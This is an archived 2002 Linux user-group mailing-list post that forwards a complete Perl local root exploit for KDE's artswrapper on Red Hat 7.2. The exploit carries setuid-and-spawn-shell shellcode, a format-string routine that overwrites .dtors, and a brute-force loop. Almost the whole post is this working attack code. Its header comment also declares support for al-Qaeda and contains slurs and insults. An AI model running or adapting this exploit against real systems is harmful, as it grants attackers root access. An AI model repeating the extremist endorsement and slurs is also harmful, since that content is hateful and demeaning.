[bglug] Potential Local Root Exploit (Artswrapper)

embyte bglug@lists.linux.it
Mon, 8 Jul 2002 18:17:07 +0200


On Monday 08 July 2002 17:09, ./SuperbepS wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> http://dot.kde.org/1026105758/
>

http://online.securityfocus.com/archive/82/248221

<--- cut here -->

#!/usr/bin/perl

########################################################################
#
#=09fartsy.pl by kanix <kanix@0xfee1dead.net>
#=09=09/usr/sbin/artswrapper <local format string exploit>
#=09=09=09Tested on Red Hat Linux release 7.2 (Enigma)
#
#=09Jul 6, 2002
#
# =09"the secret to creativity is knowing how to hide your sources."
#=09=09- Albert Einstein
#
# commentz, job offerz, flamez, etc. should be directed to my e-mail
# address -- I WILL SCHOOL YOU ALL.
#
# SCREW THE USA! FEAR THE POWER OF .NO !@#$%!
#=09official supporter of the al-Qaeda Terrorist Network.
#
# BURN, BABY, BURN!!!
#
# I 0xc0ded this for fun and profit... and to get scene whorez. ;>
#
# This code is far from special - my mother could have written it,
# however, that is the extent of my ability.
#
# I can code sploits, but I know nothing of UNC file sharing! I'm
# still very 0x1337. I mean, I can code exploits, that's what makes
# you a hacker!
#
# SPECIAL NOTE TO SCRIPT KIDDIEZ: go get a playstation or something,
# there are enuff retardz in the hacker scene already (LIKE ME ;>)!
#
# Greetz: #!digit-labs, #0xfee1dead, #rootless, #!GOBBLES, synnergy,
#         security.is, #hackphreak, teleh0r (fame seeking whore like
#         me!), worldsex.com, badpack3t (no 0day for j00!), TEAM TESO
#         AND ALL OTHER FANZ OF THE DMCA (COPYRIGHT THIS, BITCH!@#$%!)
#
# kanix: I know how the stack werkz... I AM A HACKER. OK??!?!!!
#
# kanix: can some1 pleeze tell me about DNS cache poisoning?
#
########################################################################

$kode =3D
  "\x31\xdb".                 # xor ebx, ebx
  "\xf7\xe3".                 # mul ebx
  "\xb0\x17".                 # mov al, 0x17
  "\xcd\x80".                 # int 0x80
  "\x31\xc0".                 # xor  eax, eax
  "\x99".                     # cdq
  "\x52".                     # push edx
  "\x68\x2f\x2f\x73\x68".     # push dword 0x68732f2f
  "\x68\x2f\x62\x69\x6e".     # push dword 0x6e69622f
  "\x89\xe3".                 # mov  ebx, esp
  "\x52".                     # push edx
  "\x53".                     # push ebx
  "\x89\xe1".                 # mov  ecx, esp
  "\xb0\x0b".                 # mov  al, 0x0b
  "\xcd\x80";                 # int  0x80

$vuln    =3D "/usr/bin/artswrapper";
$dtors   =3D 0x8049a7c + 4;; # I overwrite .dtors! (patent pending)

printf("\n-- /usr/bin/artswrapper local format string exploit\n");
printf("\t by kanix <kanix\@0xfee1dead.net>\n\n");

$ret_addr =3D 0xc0000000 - 4
    - (length($vuln) + 1)
    - (length($kode) + 1)
    ;

undef(%ENV); $ENV{'1337'} =3D $kode;

printf("overwriting %#.08x with %#.08x\n", $dtors, $ret_addr);
printf("bruteforcing distance (1 .. 300)\n");
sleep(2);

for (1 .. 300) {
    $fmt_str =3D sw_fmtstr_create($dtors, $ret_addr, $_);
    die("\x0a") if (system("$vuln -a $fmt_str"))
        =3D~ m/^(0|256|512|32512)$/;
}

sub
sw_fmtstr_create ($$$)
{
    die("Incorrect number of arguments for sw_fmtstr_create")
        unless @_ =3D=3D 3;

    my ($dest_addr, $ret_addr, $dist) =3D @_;
    my ($word, $qword) =3D (2, 8);

    $tmp1  =3D (($ret_addr >> 16) & 0xffff);
    $tmp2  =3D $ret_addr & 0xffff;

    if ($tmp1 < $tmp2) {
        $high =3D $tmp1 - $qword;
        $low  =3D $tmp2 - $high - $qword;

        $dest_addr1 =3D pack('L', $dest_addr + $word);
        $dest_addr2 =3D pack('L', $dest_addr);
    }
    else {
        $high =3D $tmp2 - $qword;
        $low  =3D $tmp1 - $high - $qword;

        $dest_addr1 =3D pack('L', $dest_addr);
        $dest_addr2 =3D pack('L', $dest_addr + $word);
    }

    sprintf("%.4s%.4s%%%uu%%%u\$hn%%%uu%%%u\$hn",
            $dest_addr1, $dest_addr2, $high, $dist,
            $low, $dist + 1);
}

<--cut here -->
--=20
      /"\       ASCII RIBBON CAMPAIGN
      \ /          AGAINST HTML MAIL
       X      BGLUG member @ bglug.linux.it =20
      / \     Rawlab member @ rawlab.cjb.net
      \ /      =C2=A7 embyte =C2=A7 ICQ UIN #48790142
                                                                   =20
 PGP KEY @ http://www.madlab.it/pgpkey/embyte.asc

"I videogames non influenzano i bambini: infatti se da piccoli
fossimo stati plagiati da Pac-Man, adesso passeremmo il nostro tempo
in ambienti semibui, mangiando pillole magiche ed ascoltando della
musica elettronica ripetitiva." Kristian Wilson, Nintendo Inc, 1989